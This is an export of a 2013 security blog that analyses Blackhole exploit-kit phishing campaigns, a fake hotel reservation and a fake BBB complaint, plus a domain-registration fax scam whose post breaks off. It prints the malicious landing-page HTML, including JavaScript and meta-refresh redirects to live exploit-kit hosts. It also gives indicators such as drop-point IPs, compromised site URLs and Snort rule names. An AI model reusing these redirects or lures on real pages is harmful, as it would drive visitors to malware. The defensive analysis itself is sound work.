tag:blogger.com,1999:blog-4078662551265592962024-03-14T00:17:08.723-07:00Fort Knox NetworksFort Knox Networkshttp://www.blogger.com/profile/12394479781465013402noreply@blogger.comBlogger25125tag:blogger.com,1999:blog-407866255126559296.post-6453738278738917152013-06-19T17:02:00.002-07:002013-06-19T17:02:36.305-07:00Hotel Registration Phishing Campaign with AutoClerk(?)This particular campaign is using the "shock and awe" billing technique to create urgency. This campaign is using predictable Blackhole techniques.<br />
<span style="font-size: x-small;">Also spotted on <a href="http://www.dslreports.com/forum/r28395834-personalityhotels.com-spam-points-to-compromised-site">DSL Reports</a></span><br />
<br />
<br />
Subject: <span class="Apple-tab-span" style="white-space: pre;"> </span>Your reservation at HOTEL UNION SQUARE<br />
From: <span class="Apple-tab-span" style="white-space: pre;"> </span>"Reservations" <reservations@m.personalityhotelsmail.net><br />
Date: <span class="Apple-tab-span" style="white-space: pre;"> </span>Wed, June 19, 2013 12:39 pm<br />
Priority: <span class="Apple-tab-span" style="white-space: pre;"> </span>Normal<br />
<br />
Header information:<br />
<span style="color: red;">X-Mailer: AutoClerk</span> <b><--- Whoa. Stop.</b><br />
<b>Let's dive</b><br />
<a href="http://www.autoclerk.com/news/autoclerk-introduces-emarketing-to-its-suite-of-products-and-services">http://www.autoclerk.com/news/autoclerk-introduces-emarketing-to-its-suite-of-products-and-services</a><br />
Autoclerk is a property management system that provides eMarketing to Hotels.<br />
<a href="http://www.autoclerk.com/hotel-emarketing">http://www.autoclerk.com/hotel-emarketing</a><br />
<h2 style="text-align: center;">
<span style="font-size: x-large;">^^</span></h2>
Content-Type: multipart/alternative; <b><-- Plain text and html elements k.</b><br />
X-Spam-Status: No, score=5.8 <--- <b>Not close enough.</b><br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2Q_uj7OjaFP_unFg3ZeHYo7dqQ2oefOddQPzq1pHodY2k2xXy0GNGfOMkQoAo4GHVHF6L5YPQCL1GQrXR-n1EBfUJWz1tdGYJNYRSoDKi234dTe4ZRT1bRwEnTgqnyVqKC9jH8Zxcs0w/s1600/Capture.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2Q_uj7OjaFP_unFg3ZeHYo7dqQ2oefOddQPzq1pHodY2k2xXy0GNGfOMkQoAo4GHVHF6L5YPQCL1GQrXR-n1EBfUJWz1tdGYJNYRSoDKi234dTe4ZRT1bRwEnTgqnyVqKC9jH8Zxcs0w/s400/Capture.PNG" width="376" /></a></div>
<br />
Sent to you from Copenhagen, because clearly that's where Hotel Union Square is... not.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGs3cZZoxjAualZWBqHuSce2k-vb_fPKk-aJ3atZp5iCDyDNUeKkMz7lgx4eDI8dtDmw3DjdYra_6x5hkrDOCj3IcL05rzMlRFDbe4y_2vuVQwCFYcrQH0QJRO5L5B_XVCbeHKkYxmgNQ/s1600/copenhagen.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGs3cZZoxjAualZWBqHuSce2k-vb_fPKk-aJ3atZp5iCDyDNUeKkMz7lgx4eDI8dtDmw3DjdYra_6x5hkrDOCj3IcL05rzMlRFDbe4y_2vuVQwCFYcrQH0QJRO5L5B_XVCbeHKkYxmgNQ/s1600/copenhagen.PNG" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
The payload uses a refresh method to immediately redirect you. Nothing new but we can still use this for more information.</div>
<div class="separator" style="clear: both;">
<span style="font-family: monospace;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: monospace;">(html>(CR)(LF)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: monospace;">(title>HOTEL·UNION·SQUARE·is·loading...(/title>(CR)(LF)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: monospace;">(script·type="text/javascript">(CR)(LF)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: monospace;">(!--(CR)(LF)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: monospace;"><b>location.replace("http://winne2000.net/news/enough-advise.php</b>");(CR)(LF)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: monospace;">//-->(CR)(LF)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: monospace;">(/script>(CR)(LF)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: monospace;"><b>(noscript>(</b>CR)(LF)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: monospace;"><b>(meta·http-equiv="refresh"·content="0;·url=http://winne2000.net/news/enough-advise.php</b>">(CR)(LF)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: monospace;">(/noscript>(CR)(LF)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: monospace;">(CR)(LF)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: monospace;">(/head>(CR)(LF)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: monospace;">(CR)(LF)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: monospace;">(h1>You·will·be·redirected·to·process(/h1>(CR)(LF)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: monospace;">(CR)(LF)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: monospace;">(CR)(LF)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: monospace;">(h4·style="color:#364dbc;">We·must·complete·few·security·checks·to·show·your·transfer·details:(/h4>(CR)(LF)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: monospace;">(CR)(LF)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: monospace;">(h3>Be·sure·you·have·a·transfer·reference·ID.(br·/>You·will·be·asked·to·enter·it·after·we·check·the·link.(br>(br>Important:·Please·be·advised·that·calls·to·and·from·your·wire·service·team·may·be·monitored·or·recorded.(br·/>(/h3>(CR)(LF)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: monospace;">(CR)(LF)</span></div>
<div class="separator" style="clear: both;">
<span style="color: red; font-family: monospace;">(h3><b>Redirecting·to·Complain·details...·Please·wait...</b>(/h3>(CR)(LF)</span></div>
<div>
<br /></div>
<div>
And the payload begins us with </div>
<div>
<br /></div>
<div>
<span style="color: red;"><style>b,div{color:#fff;}</style><script>function vq(){s="";zzz();az=21;try{<b>caewbtew</b>=~312;}catch(vava){az=0;}</span></div>
<div>
<br /></div>
<h3>
Let's go deeper</h3>
<div>
<br /></div>
<div>
The <b>caewbtew=~</b> string at the entry point is consistent with FedEx, <a href="https://groups.google.com/forum/?fromgroups#!searchin/alt.comp.virus/caewbtew/alt.comp.virus/Xlp886uCKDU/ptGWLsd_7pEJ">American Airlines</a>, DHL, and <a href="http://techhelplist.com/index.php/spam-list/150-receipt-for-your-paypal-payment-to-x-fake-paypal-phishing-scam">paypal</a> with some obfuscation techniques that follow. Oh yes, also the BBB Campaign I looked at <a href="http://fortknoxnetworks.blogspot.com/2013/06/bbb-phish-event-blackhole-zeroaccess.html">here.</a> There are two observed variants, one with catch(vava) and one with catch(qw). This is some lovely stuff when coupled with some other indicators and I've used it very successfully in the past.</div>
<div>
<br /></div>
<div>
This string has also been spotted in other compromised wordpress sites, about 860 indexed in google.</div>
<div>
<br /></div>
<div>
April <a href="http://jsunpack.jeek.org/?report=1389949d2b3b67f33871cbe7c001b8fb3caafe11">http://jsunpack.jeek.org/?report=1389949d2b3b67f33871cbe7c001b8fb3caafe11</a></div>
<div>
April <a href="https://gist.github.com/evilscheme/d10ea4130d5362618653/raw/d87777b84ab172a6d17ef3211539d336b53401b6/gistfile1.txt">https://gist.github.com/evilscheme/d10ea4130d5362618653/raw/d87777b84ab172a6d17ef3211539d336b53401b6/gistfile1.txt</a></div>
<div>
May <a href="http://jsunpack.jeek.org/dec/go?report=18cb65b3b38a735293e483cd4ef6588bce6cd7ec">http://jsunpack.jeek.org/dec/go?report=18cb65b3b38a735293e483cd4ef6588bce6cd7ec</a></div>
<div>
June <a href="http://jsunpack.jeek.org/dec/go?report=8bd4f7ec9acaa2e252a5964cf4069e5c37048fb0">http://jsunpack.jeek.org/dec/go?report=8bd4f7ec9acaa2e252a5964cf4069e5c37048fb0</a></div>
<div>
<br /></div>
<div>
Which also contained the string:</div>
<div>
<b><span style="color: red;">Redirecting to Complain details... Please wait...</span></b></div>
<div>
<b><span style="color: red;"><br /></span></b></div>
<div>
Something like 860 hits. Same as the BBB Campaign</div>
<div>
<br /></div>
<div>
Proving once again that nothing beats a human security analyst:</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgaBaEr2WUEBlqu-GsALqjsk9EnGUPqXTmvX81rK7ItwwphcCS63sCwem0t3hTUMrVsTwLL56uOp5FcNgeXRQA3jj2QvDh7JPOId4H9BdXxRFvtFiseV_kUf4i4f9Ma6Tvm52S2LYGQ2HE/s1600/Capture.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="226" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgaBaEr2WUEBlqu-GsALqjsk9EnGUPqXTmvX81rK7ItwwphcCS63sCwem0t3hTUMrVsTwLL56uOp5FcNgeXRQA3jj2QvDh7JPOId4H9BdXxRFvtFiseV_kUf4i4f9Ma6Tvm52S2LYGQ2HE/s400/Capture.PNG" width="400" /></a></div>
<div>
<br /></div>
<div>
I'm not going to rehash blackhole here. We know what's up. Evidence of a broader campaign below.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTqfS2k3bmHRbbnV9AhrQBflj3vyKrm5i6j7olnJAv82ZCS2LIkZCbGYSjnjelmAYhhoaLuEKKGyC_8m8kDHqMos13ATwW4Tgvwt5fa_3N5vkzTOYOFjjcSWAn0bLKrZyivxhw0hyphenhyphenr4tY/s1600/Capture.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="80" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTqfS2k3bmHRbbnV9AhrQBflj3vyKrm5i6j7olnJAv82ZCS2LIkZCbGYSjnjelmAYhhoaLuEKKGyC_8m8kDHqMos13ATwW4Tgvwt5fa_3N5vkzTOYOFjjcSWAn0bLKrZyivxhw0hyphenhyphenr4tY/s400/Capture.PNG" width="400" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
References:</div>
<div>
<a href="http://techhelplist.com/index.php/spam-list/150-receipt-for-your-paypal-payment-to-x-fake-paypal-phishing-scam">http://techhelplist.com/index.php/spam-list/150-receipt-for-your-paypal-payment-to-x-fake-paypal-phishing-scam</a></div>
<div>
<a href="https://groups.google.com/forum/?fromgroups#!searchin/alt.comp.virus/caewbtew/alt.comp.virus/Xlp886uCKDU/ptGWLsd_7pEJ">https://groups.google.com/forum/?fromgroups#!searchin/alt.comp.virus/caewbtew/alt.comp.virus/Xlp886uCKDU/ptGWLsd_7pEJ</a> (Oddly enough about a Windows 98 system hit with exploit)</div>
<div>
<a href="http://pastebin.com/vBVJUb9w">http://pastebin.com/vBVJUb9w</a></div>
<div>
<br /></div>
Fort Knox Networkshttp://www.blogger.com/profile/12394479781465013402noreply@blogger.com0tag:blogger.com,1999:blog-407866255126559296.post-14411849572819040282013-06-07T12:28:00.000-07:002013-06-07T12:37:51.117-07:00BBB Phish Event - Blackhole - ZeroAccess<div style="padding: 10px 0px 0px;">
<h3>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhP5x-vL5hFyrg4LtHb7AzAGdlCgAasP37vdXBiFKi5TkWVaHsAkLvPWpMgLxtFcH1zuupwakamyfBjxL1Pi-EyXXA7pDz678wiiv3Zk3HsaOrHWCCRuoPcVI7_slCx4dI-UZqt94bGqYk/s1600/blackhole+6-7-20133+-2.png" imageanchor="1" style="clear: left; font-size: medium; font-weight: normal; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhP5x-vL5hFyrg4LtHb7AzAGdlCgAasP37vdXBiFKi5TkWVaHsAkLvPWpMgLxtFcH1zuupwakamyfBjxL1Pi-EyXXA7pDz678wiiv3Zk3HsaOrHWCCRuoPcVI7_slCx4dI-UZqt94bGqYk/s1600/blackhole+6-7-20133+-2.png" /></a></h3>
<h3>
<span style="font-family: Arial, sans-serif;"><span style="font-size: 14px;">EMAIL</span></span></h3>
<h3>
<span style="font-family: Arial, sans-serif; font-size: 14px;">The Better Business Bureau has been filed the above mentioned reclamation from one of your clients in respect of their dealings with you. The detailed description of the consumer's anxiety are available by clicking the link below. Please give attention to this issue and notify us about your mind as soon as possible.</span></h3>
<h3>
<span style="font-family: Arial, sans-serif;"><span style="font-size: 14px;">We politely ask you to overview the <LINK>GRIEVANCE REPORT<LINK> to meet on this complaint.</span></span></h3>
<h3>
<span style="font-family: Arial, sans-serif;"><span style="font-size: 14px;">We are looking forward to your prompt response.</span></span></h3>
<h3>
<span style="font-family: Arial, sans-serif;"><span style="font-size: 14px;">Best regards</span></span><span style="font-family: Arial, sans-serif; font-size: 14px;">Tristan Lewis</span><span style="font-family: Arial, sans-serif; font-size: 14px;">Dispute Councilor</span><span style="font-family: Arial, sans-serif; font-size: 14px;">Better Business Bureau</span></h3>
<h3>
<span style="font-family: Arial, sans-serif; font-size: 14px;">==============HTML====================</span></h3>
<h3>
<span style="font-family: Arial, sans-serif; font-size: 14px;">GET /bbb.html HTTP/1.1</span><span style="font-family: Arial, sans-serif; font-size: 14px;">Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*</span><span style="font-family: Arial, sans-serif; font-size: 14px;">Accept-Language: en-us</span><span style="font-family: Arial, sans-serif; font-size: 14px;">User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)</span><span style="font-family: Arial, sans-serif; font-size: 14px;">Accept-Encoding: </span><span style="font-family: Arial, sans-serif; font-size: 14px;">Host: speedgarage.com.ua</span><span style="font-family: Arial, sans-serif; font-size: 14px;">Connection: Keep-Alive</span></h3>
<h3>
<span style="font-family: Arial, sans-serif; font-size: 14px;">HTTP/1.0 200 OK</span></h3>
<h3>
<span style="font-family: Arial, sans-serif;"><span style="font-size: 14px;">Server: nginx/1.1.10</span></span></h3>
<h3>
<span style="font-family: Arial, sans-serif;"><span style="font-size: 14px;">Date: Fri, 07 Jun 2013 17:13:03 GMT</span></span></h3>
<h3>
<span style="font-family: Arial, sans-serif;"><span style="font-size: 14px;">Content-Type: text/html</span></span></h3>
<h3>
<span style="font-family: Arial, sans-serif;"><span style="font-size: 14px;">Content-Length: 738</span></span></h3>
<h3>
<span style="font-family: Arial, sans-serif;"><span style="font-size: 14px;">Last-Modified: Fri, 07 Jun 2013 11:53:09 GMT</span></span></h3>
<h3>
<span style="font-family: Arial, sans-serif;"><span style="font-size: 14px;">Accept-Ranges: bytes</span></span></h3>
<h3>
<span style="font-family: Arial, sans-serif;"><span style="font-size: 14px;"><br /></span></span></h3>
<h3>
<span style="font-family: Arial, sans-serif;"><span style="font-size: 14px;">Connection: keep-alive</span></span></h3>
<h3>
<span style="font-family: Arial, sans-serif;"><span style="font-size: 14px;"><br /></span></span></h3>
<h3>
<span style="font-family: Arial, sans-serif;"><span style="font-size: 14px;">(html></span></span></h3>
<h3>
<span style="font-family: Arial, sans-serif;"><span style="font-size: 14px;">(title>BBB is loading...(/title></span></span></h3>
<h3>
<span style="font-family: Arial, sans-serif;"><span style="font-size: 14px;">(script type="text/javascript"></span></span></h3>
<h3>
<span style="font-family: Arial, sans-serif;"><span style="font-size: 14px;">(!--location.replace("http://pnpnews.net/news/readers-sections.php");</span></span></h3>
<h3>
<span style="font-family: Arial, sans-serif;"><span style="font-size: 14px;">//--></span></span></h3>
<h3>
<span style="font-family: Arial, sans-serif;"><span style="font-size: 14px;"><br /></span></span></h3>
<h3>
<span style="font-family: Arial, sans-serif;"><span style="font-size: 14px;">(/script></span></span></h3>
<h3>
<span style="font-family: Arial, sans-serif;"><span style="font-size: 14px;"><br /></span></span></h3>
<h3>
<span style="font-family: Arial, sans-serif;"><span style="font-size: 14px;">(noscript></span></span></h3>
<h3>
<span style="font-family: Arial, sans-serif;"><span style="font-size: 14px;">(meta http-equiv="refresh" content="0; url=http://pnpnews.net/news/readers-sections.php"></span></span></h3>
<h3>
<span style="font-family: Arial, sans-serif;"><span style="font-size: 14px;">(/noscript></span></span></h3>
<h3>
<span style="font-family: Arial, sans-serif;"><span style="font-size: 14px;">(/head></span></span></h3>
<h3>
<span style="font-family: Arial, sans-serif;"><span style="font-size: 14px;">(h1>You will be redirected to process(/h1></span></span></h3>
<h3>
<span style="font-family: Arial, sans-serif;"><span style="font-size: 14px;">(h3>Redirecting to Complain details... Please wait...(/h3></span></span></h3>
<h3>
<span style="font-family: Arial, sans-serif;"><span style="font-size: 14px;">location.replace("http://pnpnews.net/news/readers-sections.php");</span></span></h3>
<h3>
<span style="font-family: Arial, sans-serif;"><span style="font-size: 14px;">"refresh" content="0; url=http://pnpnews.net/news/readers-sections.php</span></span></h3>
<div style="font-family: Arial, sans-serif; font-size: 12px;">
<br /></div>
</div>
<div style="padding: 0px;">
<div style="font-family: 'Lucida Sans', sans-serif, arial, sans-serif; font-size: 11px;">
<span style="background-color: white;"><br /></span></div>
<div class="separator" style="clear: both; font-family: 'Lucida Sans', sans-serif, arial, sans-serif; font-size: 11px; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibmkc_ZLdbjV7s0dFhaBwclLgRbolDnNajP1Rz4ci5Xel4i4UTxxdfjaYf7uFIV_jN6TzqjKy1joOg82thwBfNP3lBUon4x_PEd8bmQCWeIYEj5aR_p5K7HGm8H1SVENPPRacR2pXD3oI/s1600/blackhole+6-7-20133.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="background-color: white; color: black;"><img border="0" height="262" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibmkc_ZLdbjV7s0dFhaBwclLgRbolDnNajP1Rz4ci5Xel4i4UTxxdfjaYf7uFIV_jN6TzqjKy1joOg82thwBfNP3lBUon4x_PEd8bmQCWeIYEj5aR_p5K7HGm8H1SVENPPRacR2pXD3oI/s640/blackhole+6-7-20133.png" width="640" /></span></a></div>
<div style="font-family: 'Lucida Sans', sans-serif, arial, sans-serif; font-size: 11px;">
<span style="background-color: white;"><br /></span></div>
<span style="font-family: Lucida Sans, sans-serif, arial, sans-serif; font-size: large;">Payload: pnpnews.net</span><br />
<span style="font-family: Lucida Sans, sans-serif, arial, sans-serif;"><span style="font-size: 11px;"><br /></span></span>
<span style="font-family: Lucida Sans, sans-serif, arial, sans-serif; font-size: large;">Exploit Kit: Blackhole</span><br />
<span style="font-family: Lucida Sans, sans-serif, arial, sans-serif;"><span style="font-size: 11px;"><br /></span></span>
<span style="font-family: Lucida Sans, sans-serif, arial, sans-serif; font-size: large;">Snort Rules </span><br />
<span style="font-family: Lucida Sans, sans-serif, arial, sans-serif;"><span style="font-size: 11px;"><br /></span></span>
<span style="font-family: Lucida Sans, sans-serif, arial, sans-serif; font-size: x-small;">ET TROJAN Spoofed MSIE 7 User-Agent Likely Ponmocup</span><br />
<span style="font-family: Lucida Sans, sans-serif, arial, sans-serif; font-size: x-small;">ET CURRENT_EVENTS SUSPICIOUS JAR Download by Java UA with non JAR EXT matches various EKs</span><br />
<span style="font-family: Lucida Sans, sans-serif, arial, sans-serif; font-size: x-small;">ET INFO Packed Executable Download</span><br />
<span style="font-family: 'Lucida Sans', sans-serif, arial, sans-serif; font-size: x-small;">ET CURRENT_EVENTS Blackhole request for Payload</span><br />
<span style="font-family: Lucida Sans, sans-serif, arial, sans-serif; font-size: x-small;">ET CURRENT_EVENTS BlackHole EK JNLP request</span><br />
<span style="font-family: Lucida Sans, sans-serif, arial, sans-serif; font-size: x-small;">ET CURRENT_EVENTS - Possible BlackHole request with decryption Base</span><br />
<span style="font-family: Lucida Sans, sans-serif, arial, sans-serif; font-size: x-small;">ET TROJAN Pony Downloader check-in response STATUS-IMPORT-OK</span><br />
<span style="font-family: Lucida Sans, sans-serif, arial, sans-serif; font-size: x-small;">ET TROJAN Known Trojan Downloader HTTP Library MSIE 5 Win98 seen with ZeuS</span><br />
<span style="font-family: Lucida Sans, sans-serif, arial, sans-serif; font-size: x-small;">ET TROJAN Fareit/Pony Downloader Checkin 2</span><br />
<span style="font-family: Lucida Sans, sans-serif, arial, sans-serif; font-size: x-small;">ET CURRENT_EVENTS DRIVEBY Blackhole - Payload Download - readme.exe</span><br />
<span style="font-family: Lucida Sans, sans-serif, arial, sans-serif; font-size: x-small;">ET CURRENT_EVENTS DRIVEBY Blackhole - Payload Download - contacts.exe</span><br />
<span style="font-family: Lucida Sans, sans-serif, arial, sans-serif; font-size: x-small;">ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (6)</span><br />
<span style="font-family: Lucida Sans, sans-serif, arial, sans-serif; font-size: x-small;">ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (5)</span><br />
<span style="font-family: Lucida Sans, sans-serif, arial, sans-serif; font-size: x-small;">ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (41)</span><br />
<span style="font-family: Lucida Sans, sans-serif, arial, sans-serif; font-size: x-small;">ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (33)</span><br />
<span style="font-family: Lucida Sans, sans-serif, arial, sans-serif; font-size: x-small;">ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (13)</span><br />
<span style="font-family: Lucida Sans, sans-serif, arial, sans-serif;"><br /></span>
<span style="font-family: Lucida Sans, sans-serif, arial, sans-serif; font-size: large;">Drop Points: </span><br />
<span style="font-family: Lucida Sans, sans-serif, arial, sans-serif;">88.191.130.98:8080</span><br />
<br />
<ul>
<li><span style="font-family: 'Lucida Sans', sans-serif, arial, sans-serif;">8080/tcp open http nginx 1.0.10</span></li>
<li><span style="font-family: Lucida Sans, sans-serif, arial, sans-serif;">21/tcp open ftp Pure-FTPd</span></li>
<li><span style="font-family: Lucida Sans, sans-serif, arial, sans-serif;">22/tcp open ssh OpenSSH 5.3p1 Debian 3ubuntu7 (protocol 2.0)</span></li>
<li><span style="font-family: Lucida Sans, sans-serif, arial, sans-serif;">25/tcp open smtp Postfix smtpd</span></li>
<li><span style="font-family: Lucida Sans, sans-serif, arial, sans-serif;">80/tcp open http Apache httpd 2.2.14 ((Ubuntu))</span></li>
<li><span style="font-family: 'Lucida Sans', sans-serif, arial, sans-serif;">8080/tcp open http nginx 1.0.10</span></li>
<li><span style="font-family: Lucida Sans, sans-serif, arial, sans-serif;">8090/tcp open http nginx 1.2.6</span></li>
</ul>
<br />
<span style="font-family: Lucida Sans, sans-serif, arial, sans-serif;">213.214.74.5:8080 </span><br />
<br />
<ul>
<li><span style="font-family: 'Lucida Sans', sans-serif, arial, sans-serif;">8080/tcp open http nginx 1.0.10</span></li>
<li><span style="font-family: 'Lucida Sans', sans-serif, arial, sans-serif;">21/tcp open ftp ProFTPD 1.3.3d</span></li>
<li><span style="font-family: 'Lucida Sans', sans-serif, arial, sans-serif;">22/tcp open ssh OpenSSH 5.8p1 Debian 1ubuntu3 (protocol 2.0)</span></li>
<li><span style="font-family: 'Lucida Sans', sans-serif, arial, sans-serif;">80/tcp open http Apache httpd 2.2.17 ((Ubuntu))</span></li>
</ul>
<br />
<ul></ul>
<ul></ul>
<span style="font-family: Lucida Sans, sans-serif, arial, sans-serif;"><br /></span>
<span style="font-family: Lucida Sans, sans-serif, arial, sans-serif; font-size: large;">Disk Artifacts of Interest: </span><br />
<span style="font-family: Lucida Sans, sans-serif, arial, sans-serif;"><br /></span>
<span style="font-family: 'Lucida Sans', sans-serif, arial, sans-serif;">exp1.tmp.exe | VirusTotal Detected as: PSW.Generic | Fareit | Zero Access 30/47</span><br />
<span style="font-family: Lucida Sans, sans-serif, arial, sans-serif;">exp1.tmp</span><br />
<span style="font-family: Lucida Sans, sans-serif, arial, sans-serif;">exp2.tmp</span><br />
<span style="font-family: Lucida Sans, sans-serif, arial, sans-serif;"><br /></span>
<br />
<span style="font-family: Lucida Sans, sans-serif, arial, sans-serif; font-size: large;">URLs Involved</span><br />
<span style="font-family: Lucida Sans, sans-serif, arial, sans-serif;">hxxp://carpenterpricebreaker.com/bbb.html</span><br />
<span style="font-family: Lucida Sans, sans-serif, arial, sans-serif;">hxxp://ecotopia.pl/bbb.html</span><br />
<span style="font-family: Lucida Sans, sans-serif, arial, sans-serif;">hxxp://gite-cantal-meandres.fr/bbb.html</span><br />
<span style="font-family: Lucida Sans, sans-serif, arial, sans-serif;">hxxp://ib-greb.de/bbb.html</span><br />
<span style="font-family: Lucida Sans, sans-serif, arial, sans-serif;">hxxp://intelaboratory.com/bbb.html</span><br />
<span style="font-family: Lucida Sans, sans-serif, arial, sans-serif;">hxxp://rentbaku.com/bbb.html</span><br />
<span style="font-family: Lucida Sans, sans-serif, arial, sans-serif;">hxxp://slavamoskovkin.ru/bbb.html</span><br />
<span style="font-family: Lucida Sans, sans-serif, arial, sans-serif;">hxxp://speedgarage.com.ua/bbb.html</span><br />
<span style="font-family: Lucida Sans, sans-serif, arial, sans-serif;">hxxp://vmoskalev.ru/bbb.html</span><br />
<div style="font-family: 'Lucida Sans', sans-serif, arial, sans-serif; font-size: 11px;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhP5x-vL5hFyrg4LtHb7AzAGdlCgAasP37vdXBiFKi5TkWVaHsAkLvPWpMgLxtFcH1zuupwakamyfBjxL1Pi-EyXXA7pDz678wiiv3Zk3HsaOrHWCCRuoPcVI7_slCx4dI-UZqt94bGqYk/s1600/blackhole+6-7-20133+-2.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><br /></a></div>
<div style="font-family: 'Lucida Sans', sans-serif, arial, sans-serif; font-size: 11px;">
<br /></div>
</div>
Fort Knox Networkshttp://www.blogger.com/profile/12394479781465013402noreply@blogger.com0tag:blogger.com,1999:blog-407866255126559296.post-16400054574336192332013-04-28T07:31:00.003-07:002013-04-28T18:29:27.355-07:00Let's Deep Dive a Domain Registration Scam EmailHaving an internet presence for so long, I have seen many of these.<br />
<br />
These emails are using the BMX Mailer, with a Precedence field, online virtual fax numbers and has some ties to a Romanian web server. The goal is to switch you to their "domain registration" service for an affordable $75/year lol.<br />
<br />
You only have to fax them a credit card form.<br />
<br />
Here's a copy of the email:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi91LDOwECQ9WikFqX1Xx4ZZCCG2AKS-ZvM0p1MmBj7q-ctxmXM9_LPgE5ODd5-RQ-blt5XD8dra8nOXRe4FE5wXHlNkLdGR-z9f5f_9NIdbi2BsAAFbYkFHSe63Ss4jkNYJUqvIIWynpQ/s1600/domain-renewal-junk.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="255" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi91LDOwECQ9WikFqX1Xx4ZZCCG2AKS-ZvM0p1MmBj7q-ctxmXM9_LPgE5ODd5-RQ-blt5XD8dra8nOXRe4FE5wXHlNkLdGR-z9f5f_9NIdbi2BsAAFbYkFHSe63Ss4jkNYJUqvIIWynpQ/s400/domain-renewal-junk.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
Sent from a hotmail address, so clearly legitimate</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTkHZEZD9RW_JQ9WOS_DEs8OPkrYQHassZEl8xQo3QTS1W9S9mZveFH2hFwIRrbEhj5Oydy0fTPTNVgHRhyXmPbp2TvteDvWQsNzVoV7m-dBOWFlZbYdZ9XDeBarxkUdY8TMpTnMoXf8Q/s1600/domain-renewal-junk-header.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="88" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTkHZEZD9RW_JQ9WOS_DEs8OPkrYQHassZEl8xQo3QTS1W9S9mZveFH2hFwIRrbEhj5Oydy0fTPTNVgHRhyXmPbp2TvteDvWQsNzVoV7m-dBOWFlZbYdZ9XDeBarxkUdY8TMpTnMoXf8Q/s640/domain-renewal-junk-header.PNG" width="640" /></a></div>
<br />
<div style="text-align: center;">
It is important to note that the message guarantees 100% satisfaction.</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
